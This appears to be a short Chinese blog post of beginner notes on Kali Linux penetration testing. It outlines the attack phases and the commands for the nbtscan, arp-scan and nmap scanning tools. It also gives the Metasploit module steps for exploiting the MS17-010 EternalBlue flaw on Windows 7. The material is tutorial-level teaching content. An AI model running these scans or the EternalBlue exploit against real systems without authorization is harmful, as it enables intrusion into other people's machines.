wuhuimin521的博客

前端小白

Kali Linux 渗透测试原理与实践

Kali Linux 渗透测试原理与实践

渗透测试:模拟黑客行为对目标系统发起攻击,根据攻击结果得到安全评估报告

渗透前期:(网络踩点,网络扫描,网络查点)

渗透中期:(利用漏洞信息进行渗透攻击,获取权限)

渗透后期:(后渗透维持攻击,文件拷贝,木马植入)


信息收集(  扫描 )

arp-scan/nbtscan:局域网扫描(发送一个探测包,检测启动了什么服务)

nmap端口扫描  电脑漏洞也可以扫描

openvas/nessus 漏洞扫描

安装kali linux 百度有具体步骤

打开执行 nbtscan +网段 可以看到目前网段内的主机

执行 arp-scan --interface=eth0 +网段如(172.16.70.0/24)网段扫描


nmap




Exploit/POC:渗透测试代码,根据存在的漏洞,编写攻击代码。

MS17-010漏洞  “永恒之蓝”漏洞利用

Kali Linux-->windows7  (常规流程)

msf-->search ms17_010

msf-->use exploit/windows/smb/ms17_010_eternalblue

msf-->exploit

show options



阅读更多
想对作者说点什么? 我来说一句

Kali Linux Web 渗透测试秘籍

2017年09月26日 6.63MB 下载

Kali Linux渗透测试的艺术

2018年04月27日 24.25MB 下载

Kali Linux渗透测试技术详解

2015年08月14日 63.41MB 下载

kali linux渗透测试的艺术

2018年01月03日 6.21MB 下载

Kali Linux渗透测试的艺术 中文版

2016年07月06日 25.79MB 下载

没有更多推荐了,返回首页

不良信息举报

Kali Linux 渗透测试原理与实践

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭